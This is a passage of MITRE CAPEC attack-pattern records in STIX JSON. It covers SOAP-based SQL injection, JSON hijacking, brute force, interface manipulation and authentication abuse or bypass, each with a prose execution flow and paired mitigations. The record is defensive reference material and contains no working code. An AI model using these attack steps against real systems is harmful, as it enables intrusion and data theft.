  1. Inject SQL via SOAP Parameters: The attacker injects SQL via SOAP parameters identified as vulnerable during Explore phase to launch a first or second order SQL injection attack.

  2. Techniques
    An attacker performs a SQL injection attack via the usual methods leveraging SOAP parameters as the injection vector. An attacker has to be careful not to break the XML parser at the service provider which may prevent the payload getting through to the SQL query. The attacker may also look at the WSDL for the web service (if available) to better understand what is expected by the service provider.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "SOAP messages are used as a communication mechanism in the system", + "SOAP parameters are not properly validated at the service provider", + "The service provider does not properly utilize parameter binding when building SQL queries" + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "High": "If the attacker has to perform Blind SQL Injection", + "Medium": "If the attacker is able to gain good understanding of the system's database schema" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Properly validate and sanitize/reject user input at the service provider.", + "id": "course-of-action--b95cd192-7218-4771-85a6-6d6359c63b34", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-110-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a3a9b355-487c-4cfd-904c-055007648f78", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b95cd192-7218-4771-85a6-6d6359c63b34", + "target_ref": "attack-pattern--7c90bef7-530c-427b-8fb7-f9d3eda9c26a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that prepared statements or other mechanism that enables parameter binding 
is used when accessing the database in a way that would prevent the attackers' supplied data from controlling the structure of the executed query.", + "id": "course-of-action--b4508bd0-d52b-4b82-b35c-ba342a6d024b", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-110-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ecba2a2e-f73d-4937-9f4e-d8650932e41a", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b4508bd0-d52b-4b82-b35c-ba342a6d024b", + "target_ref": "attack-pattern--7c90bef7-530c-427b-8fb7-f9d3eda9c26a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "At the database level, ensure that the database user used by the application in a particular context has the minimum needed privileges to the database that are needed to perform the operation. 
When possible, run queries against pre-generated views rather than the tables directly.", + "id": "course-of-action--58d0cbaa-2fda-4d1c-bbe1-8405dc79acbb", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-110-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c0ab5963-a4b2-4dab-aeee-924ec742c54a", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--58d0cbaa-2fda-4d1c-bbe1-8405dc79acbb", + "target_ref": "attack-pattern--7c90bef7-530c-427b-8fb7-f9d3eda9c26a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker targets a system that uses JavaScript Object Notation (JSON) as a transport mechanism between the client and the server (common in Web 2.0 systems using AJAX) to steal possibly confidential information transmitted from the server back to the client inside the JSON object by taking advantage of the loophole in the browser's Same Origin Policy that does not prohibit JavaScript from one website to be included and executed in the context of another website.", + "external_references": [ + { + "external_id": "CAPEC-111", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/111.html" + }, + { + "external_id": "CWE-345", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/345.html" + }, + { + "external_id": "CWE-346", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/346.html" + }, + { + "external_id": "CWE-352", + "source_name": "cwe", + "url": 
"http://cwe.mitre.org/data/definitions/352.html" + } + ], + "id": "attack-pattern--5b2d7149-c0f3-4b42-9c10-febe7dfd3ea5", + "modified": "2022-09-29T00:00:00.000Z", + "name": "JSON Hijacking (aka JavaScript Hijacking)", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--c727c058-2c9d-4021-a1ec-81dd030dea59" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n Gmail service was found to be vulnerable to a JSON Hijacking attack that enabled an attacker to get the contents of the victim's address book. An attacker could send an e-mail to the victim's Gmail account (which ensures that the victim is logged in to Gmail when they receive it) with a link to the attackers' malicious site. If the victim clicked on the link, a request (containing the victim's authenticated session cookie) would be sent to the Gmail servers to fetch the victim's address book. This functionality is typically used by the Gmail service to get this data on the fly so that the user can be provided a list of contacts from which to choose the recipient of the e-mail.\n When the JSON object with the contacts came back, it was loaded into the JavaScript space via a script tag on the attackers' malicious page. Since the JSON object was never assigned to a local variable (which would have prevented a script from a different domain accessing it due to the browser's same origin policy), another mechanism was needed to access the data that it contained. That mechanism was overwriting the internal array constructor with the attackers' own constructor in order to gain access to the JSON object's contents. These contents could then be transferred to the site controlled by the attacker.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Understand How to Request JSON Responses from the Target System: An attacker first explores the target system to understand what URLs need to be provided to it in order to retrieve JSON objects that contain information of interest to the attacker.

  2. Techniques
    An attacker creates an account with the target system and observes requests and the corresponding JSON responses from the server. Understanding how to properly elicit responses from the server is crucial to the attackers' ability to craft the exploit.

Experiment

  1. [Craft a malicious website]The attacker crafts a malicious website to which they plan to lure the victim who is using the vulnerable target system. The malicious website does two things:\n \n 1. Contains a hook that intercepts incoming JSON objects, reads their contents and forwards the contents to the server controlled by the attacker (via a new XMLHttpRequest).\n 2. Uses the script tag with a URL in the source that requests a JSON object from the vulnerable target system. Once the JSON object is transmitted to the victim's browser, the malicious code (as described in step 1) intercepts that JSON object, steals its contents, and forwards to the attacker.\n \n This attack step leverages the fact that the same origin policy in the browser does not protect JavaScript originating from one domain from setting up an environment to intercept and access JSON objects arriving from a completely different domain.\n

Exploit

  1. Launch JSON hijack: An attacker lures the victim to the malicious website or leverages other means to get their malicious code executing in the victim's browser. Once that happens, the malicious code makes a request to the victim target system to retrieve a JSON object with sensitive information. The request includes the victim's session cookie if the victim is logged in.

  2. Techniques
    An attacker employs a myriad of standard techniques to get the victim to visit their malicious site or by some other means get the attackers' malicious code executing in the victim's browser.
", + "x_capec_extended_description": "\n An attacker gets the victim to visit their malicious page that contains a script tag whose source points to the vulnerable system with a URL that requests a response from the server containing a JSON object with possibly confidential information. The malicious page also contains malicious code to capture the JSON object returned by the server before any other processing on it can take place, typically by overriding the JavaScript function used to create new objects. This hook allows the malicious code to get access to the creation of each object and transmit the possibly sensitive contents of the captured JSON object to the attackers' server.\n There is nothing in the browser's security model to prevent the attackers' malicious JavaScript code (originating from attacker's domain) to set up an environment (as described above) to intercept a JSON object response (coming from the vulnerable target system's domain), read its contents and transmit to the attackers' controlled site. The same origin policy protects the domain object model (DOM), but not the JSON.\n ", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "JSON is used as a transport mechanism between the client and the server", + "The target server cannot differentiate real requests from forged requests", + "The JSON object returned from the server can be accessed by the attackers' malicious code via a script tag" + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Medium": "Once this attack pattern is developed and understood, creating an exploit is not very complex.The attacker needs to have knowledge of the URLs that need to be accessed on the target system to request the JSON objects." 
+ }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that server side code can differentiate between legitimate requests and forged requests. The solution is similar to protection against Cross Site Request Forger (CSRF), which is to use a hard to guess random nonce (that is unique to the victim's session with the server) that the attacker has no way of knowing (at least in the absence of other weaknesses). Each request from the client to the server should contain this nonce and the server should reject all requests that do not contain the nonce.", + "id": "course-of-action--f87b1daf-edf4-4fb0-bc8e-a042d0c2d43e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-111-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--739ac6c9-0bf4-4b2b-80c8-407013b2e9fa", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f87b1daf-edf4-4fb0-bc8e-a042d0c2d43e", + "target_ref": "attack-pattern--5b2d7149-c0f3-4b42-9c10-febe7dfd3ea5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "On the client side, the system's design could make it difficult to get access to the JSON object content via the script tag. Since the JSON object is never assigned locally to a variable, it cannot be readily modified by the attacker before being used by a script tag. 
For instance, if while(1) was added to the beginning of the JavaScript returned by the server, trying to access it with a script tag would result in an infinite loop. On the other hand, legitimate client side code can remove the while(1) statement after which the JavaScript can be evaluated. A similar result can be achieved by surrounding the returned JavaScript with comment tags, or using other similar techniques (e.g. wrapping the JavaScript with HTML tags).", + "id": "course-of-action--00b17d50-1313-4019-81d7-ac8cfda42439", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-111-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0b7db0b5-d1c4-48fa-aef5-d966935fecc5", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--00b17d50-1313-4019-81d7-ac8cfda42439", + "target_ref": "attack-pattern--5b2d7149-c0f3-4b42-9c10-febe7dfd3ea5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Make the URLs in the system used to retrieve JSON objects unpredictable and unique for each user session.", + "id": "course-of-action--9085eee9-2f7e-4b3b-bbea-dbc4f0d0044f", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-111-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": 
"relationship--ce344fe2-2f03-491f-a465-a5e7578ca3aa", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9085eee9-2f7e-4b3b-bbea-dbc4f0d0044f", + "target_ref": "attack-pattern--5b2d7149-c0f3-4b42-9c10-febe7dfd3ea5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that to the extent possible, no sensitive data is passed from the server to the client via JSON objects. JavaScript was never intended to play that role, hence the same origin policy does not adequate address this scenario.", + "id": "course-of-action--ec731c48-7174-45e1-85e5-b82150c25e2f", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-111-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ccdf4c19-dc2a-46b4-b444-b78da5d0300f", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ec731c48-7174-45e1-85e5-b82150c25e2f", + "target_ref": "attack-pattern--5b2d7149-c0f3-4b42-9c10-febe7dfd3ea5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In this attack, some asset (information, functionality, identity, etc.) is protected by a finite secret value. 
The attacker attempts to gain access to this asset by using trial-and-error to exhaustively explore all the possible secret values in the hope of finding the secret (or a value that is functionally equivalent) that will unlock the asset.", + "external_references": [ + { + "external_id": "CAPEC-112", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/112.html" + }, + { + "external_id": "CWE-330", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/330.html" + }, + { + "external_id": "CWE-326", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/326.html" + }, + { + "external_id": "CWE-521", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/521.html" + }, + { + "description": "Brute Force", + "external_id": "T1110", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1110" + }, + { + "description": "Brute Force", + "external_id": "11", + "source_name": "WASC", + "url": "http://projects.webappsec.org/Brute-Force" + }, + { + "description": "Brute force attack", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Brute_force_attack" + } + ], + "id": "attack-pattern--7b423196-9de6-400f-91de-a1f26b3f19f1", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Brute Force", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Read Data", + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine secret testing procedure: Determine how a potential guess of the secret may be tested. This may be accomplished by comparing some manipulation of the secret to a known value, use of the secret to manipulate some known set of data and determining if the result displays specific characteristics (for example, turning cryptotext into plaintext), or by submitting the secret to some external authority and having the external authority respond as to whether the value was the correct secret. Ideally, the attacker will want to determine the correctness of their guess independently since involvement of an external authority is usually slower and can provide an indication to the defender that a brute-force attack is being attempted.

  2. Techniques
    Determine if there is a way to parallelize the attack. Most brute force attacks can take advantage of parallel techniques by dividing the search space among available resources, thus dividing the average time to success by the number of resources available. If there is a single choke point, such as a need to check answers with an external authority, the attackers' position is significantly degraded.
  3. Reduce search space: Find ways to reduce the secret space. The smaller the attacker can make the space they need to search for the secret value, the greater their chances for success. There are a great many ways in which the search space may be reduced.

  4. Techniques
    If possible, determine how the secret was selected. If the secret was determined algorithmically (such as by a random number generator) the algorithm may have patterns or dependencies that reduce the size of the secret space. If the secret was created by a human, behavioral factors may, if not completely reduce the space, make some types of secrets more likely than others. (For example, humans may use the same secrets in multiple places or use secrets that look or sound familiar for ease of recall.)
    If the secret was chosen algorithmically, cryptanalysis can be applied to the algorithm to discover patterns in this algorithm. (This is true even if the secret is not used in cryptography.) Periodicity, the need for seed values, or weaknesses in the generator all can result in a significantly smaller secret space.
    If the secret was chosen by a person, social engineering and simple espionage can indicate patterns in their secret selection. If old secrets can be learned (and a target may feel they have little need to protect a secret that has been replaced) hints as to their selection preferences can be gleaned. These can include character substitutions a target employs, patterns in sources (dates, famous phrases, music lyrics, family members, etc.). Once these patterns have been determined, the initial efforts of a brute-force attack can focus on these areas.
    Some algorithmic techniques for secret selection may leave indicators that can be tested for relatively easily and which could then be used to eliminate large areas of the search space for consideration. For example, it may be possible to determine that a secret does or does not start with a given character after a relatively small number of tests. Alternatively, it might be possible to discover the length of the secret relatively easily. These discoveries would significantly reduce the search space, thus increasing speed with which the attacker discovers the secret.
  5. Expand victory conditions: It is sometimes possible to expand victory conditions. For example, the attacker might not need to know the exact secret but simply needs a value that produces the same result using a one-way function. While doing this does not reduce the size of the search space, the presence of multiple victory conditions does reduce the likely amount of time that the attacker will need to explore the space before finding a workable value.

Exploit

  1. Gather information so attack can be performed independently.: If possible, gather the necessary information so a successful search can be determined without consultation of an external authority. This can be accomplished by capturing cryptotext (if the goal is decoding the text) or the encrypted password dictionary (if the goal is learning passwords).

", + "x_capec_extended_description": "\n Examples of secrets can include, but are not limited to, passwords, encryption keys, database lookup keys, and initial values to one-way functions. The key factor in this attack is the attackers' ability to explore the possible secret space rapidly. This, in turn, is a function of the size of the secret space and the computational power the attacker is able to bring to bear on the problem. If the attacker has modest resources and the secret space is large, the challenge facing the attacker is intractable. Assuming a finite secret space, a brute force attack will eventually succeed. The defender must rely on making sure that the time and resources necessary to do so will exceed the value of the information.\n ", + "x_capec_parent_of_refs": [ + "attack-pattern--86a5e931-7f53-46fe-b6f0-c88498f6557f", + "attack-pattern--8d88a81c-bde9-4fb3-acbe-901c783d6427" + ], + "x_capec_prerequisites": [ + "The attacker must be able to determine when they have successfully guessed the secret. As such, one-time pads are immune to this type of attack since there is no way to determine when a guess is correct." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack. Ultimately, the speed with which an attacker discovers a secret is directly proportional to the computational resources the attacker has at their disposal. This attack method is resource expensive: having large amounts of computational power do not guarantee timely success, but having only minimal resources makes the problem intractable against all but the weakest secret selection procedures." + ], + "x_capec_skills_required": { + "Low": "The attack simply requires basic scripting ability to automate the exploration of the search space. More sophisticated attackers may be able to use more advanced methods to reduce the search space and increase the speed with which the secret is located." 
+ }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Select a provably large secret space for selection of the secret. Provably large means that the procedure by which the secret is selected does not have artifacts that significantly reduce the size of the total secret space.", + "id": "course-of-action--6863b358-1e48-48e0-b084-56c5cc603fb4", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-112-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--cc237ef1-9283-4680-b8d0-9ef4a0cf8147", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6863b358-1e48-48e0-b084-56c5cc603fb4", + "target_ref": "attack-pattern--7b423196-9de6-400f-91de-a1f26b3f19f1", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use a secret space that is well known and with no known patterns that may reduce functional size.", + "id": "course-of-action--aaaca7bd-c8e3-477f-8457-0dd2fa58b41c", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-112-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c266ae48-e3db-42b8-b3ce-57936242fa62", + 
"modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--aaaca7bd-c8e3-477f-8457-0dd2fa58b41c", + "target_ref": "attack-pattern--7b423196-9de6-400f-91de-a1f26b3f19f1", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Do not provide the means for an attacker to determine success independently. This forces the attacker to check their guesses against an external authority, which can slow the attack and warn the defender. This mitigation may not be possible if testing material must appear externally, such as with a transmitted cryptotext.", + "id": "course-of-action--4cce5adb-bd38-46a1-b756-9c85290ad8e7", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-112-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--720b2d97-9125-482c-b7b3-c17acce30c06", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4cce5adb-bd38-46a1-b756-9c85290ad8e7", + "target_ref": "attack-pattern--7b423196-9de6-400f-91de-a1f26b3f19f1", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary manipulates the use or processing of an interface (e.g. 
Application Programming Interface (API) or System-on-Chip (SoC)) resulting in an adverse impact upon the security of the system implementing the interface. This can allow the adversary to bypass access control and/or execute functionality not intended by the interface implementation, possibly compromising the system which integrates the interface. Interface manipulation can take on a number of forms including forcing the unexpected use of an interface or the use of an interface in an unintended way.", + "external_references": [ + { + "external_id": "CAPEC-113", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/113.html" + }, + { + "external_id": "CWE-1192", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1192.html" + } + ], + "id": "attack-pattern--f4186110-0c20-42fa-bc6f-d0ff9f700f91", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Interface Manipulation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_example_instances": [ + "An adversary may make a request to an application that leverages a non-standard API that is known to incorrectly validate its data and thus it may be manipulated by supplying metacharacters or alternate encodings as input, resulting in any number of injection flaws, including SQL injection, cross-site scripting, or command execution.", + "API methods not intended for production, such as debugging or testing APIs, may not be disabled when deploying in a production environment. As a result, dangerous functionality can be exposed within the production environment, which an adversary can leverage to execute additional attacks.", + "SoC components contain insufficient identifiers, which allows an adversary to reset the device at will or read sensitive data from the device." 
+ ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--b289975f-c5e0-4d27-bf50-5937bfd02cfd", + "attack-pattern--a0fc32ad-ef32-44d5-9937-5968f5e7b78c", + "attack-pattern--f90601a6-9e18-4e96-804d-01a4f4ea30f2", + "attack-pattern--d0db3641-ee0d-4897-89aa-3c85c69377a5" + ], + "x_capec_prerequisites": [ + "The target system must expose interface functionality in a manner that can be discovered and manipulated by an adversary. This may require reverse engineering the interface or decrypting/de-obfuscating client-server exchanges." + ], + "x_capec_resources_required": [ + "The requirements vary depending upon the nature of the interface. For example, application-layer APIs related to the processing of the HTTP protocol may require one or more of the following: an Adversary-In-The-Middle (CAPEC-94) proxy, a web browser, or a programming/scripting language." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker obtains unauthorized access to an application, service or device either through knowledge of the inherent weaknesses of an authentication mechanism, or by exploiting a flaw in the authentication scheme's implementation. 
In such an attack an authentication mechanism is functioning but a carefully controlled sequence of events causes the mechanism to grant access to the attacker.", + "external_references": [ + { + "external_id": "CAPEC-114", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/114.html" + }, + { + "external_id": "CWE-287", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/287.html" + }, + { + "external_id": "CWE-1244", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1244.html" + }, + { + "description": "Abuse Elevation Control Mechanism", + "external_id": "T1548", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1548" + } + ], + "id": "attack-pattern--2e2ed1f8-f736-4fc9-83bc-308595fc6e03", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Authentication Abuse", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_extended_description": "\n This attack may exploit assumptions made by the target's authentication procedures, such as assumptions regarding trust relationships or assumptions regarding the generation of secret values. This attack differs from Authentication Bypass attacks in that Authentication Abuse allows the attacker to be certified as a valid user through illegitimate means, while Authentication Bypass allows the user to access protected material without ever being certified as an authenticated user. 
This attack does not rely on prior sessions established by successfully authenticating users, as relied upon for the \"Exploitation of Session Variables, Resource IDs and other Trusted Credentials\" attack patterns.\n ", + "x_capec_parent_of_refs": [ + "attack-pattern--229804f0-b017-4a26-937b-159da866bf9a" + ], + "x_capec_prerequisites": [ + "An authentication mechanism or subsystem implementing some form of authentication such as passwords, digest authentication, security certificates, etc. which is flawed in some way." + ], + "x_capec_resources_required": [ + "A client application, command-line access to a binary, or scripting language capable of interacting with the authentication mechanism." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker gains access to application, service, or device with the privileges of an authorized or privileged user by evading or circumventing an authentication mechanism. 
The attacker is therefore able to access protected data without authentication ever having taken place.", + "external_references": [ + { + "external_id": "CAPEC-115", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/115.html" + }, + { + "external_id": "CWE-287", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/287.html" + }, + { + "description": "Abuse Elevation Control Mechanism", + "external_id": "T1548", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1548" + }, + { + "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)", + "external_id": "REF-598", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/04-Authentication_Testing/04-Testing_for_Bypassing_Authentication_Schema.html" + } + ], + "id": "attack-pattern--8f665166-dfd1-40cb-91e8-b78bee1ceb6a", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Authentication Bypass", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_can_follow_refs": [ + "attack-pattern--b89511b6-f0fb-4c1d-a884-a0d5a0d82b4e", + "attack-pattern--ae3f2c33-9018-442e-9cc3-24d65c7f4974", + "attack-pattern--d845a25b-b140-438c-91d7-30b709bb6e18", + "attack-pattern--ba694895-a0cf-494e-ace2-bf3488330b80" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_extended_description": "\n This refers to an attacker gaining access equivalent to an authenticated user without ever going through an authentication procedure. This is usually the result of the attacker using an unexpected access procedure that does not go through the proper checkpoints where authentication should occur. 
